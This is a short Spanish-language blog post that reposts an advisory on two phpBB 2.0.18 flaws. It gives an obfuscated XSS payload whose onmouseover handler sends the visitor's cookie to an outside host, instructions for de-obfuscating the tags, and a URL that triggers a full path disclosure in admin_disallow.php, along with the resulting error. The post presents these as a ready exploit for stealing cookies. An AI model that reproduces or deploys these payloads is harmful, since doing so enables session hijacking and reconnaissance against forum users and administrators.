phpBB 2.0.18 XSS and Full Path Disclosure
--- 1. XSS ---
Si en phpbb es permitido etiquetas HTML tales como b,i,u,pre y tenemos en nuestro perfil
"Always allow HTML: YES"
se pueden usar estas etiquetas:
/b c = "" \ " onmouseover="alert('Mousehack')" X=" /b\ H O L A //b
Exploit:
/b c = "" \ "
onmouseover="alert(document.location='http://HOST/cookies?'+document.cookie)"
X= "/b\ H O L A //b
y asi se obtiene la cookie.
- --- 2. Full Path Disclosure ---
En el archivo admin/admin_disallow.php tenemos:
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);
return;
}
- -25-31---
La funcion append_sid() no existe. Y si usted tiene:
register_globals = On
display_errors = On
podemos usar:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
lo que muestra:
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid()
in /www/2018/phpBB2/admin/admin_disallow.php on line 28
- -RESULT ERROR---
fuente:securityreason.com
Nota: remplazar las ¨/\¨por las ¨<->¨correspondientes y suprimir los espacios
salu2
publicado por Mousehack a las 8:22 p. m.
0 Comments:
Publicar un comentario
<< Home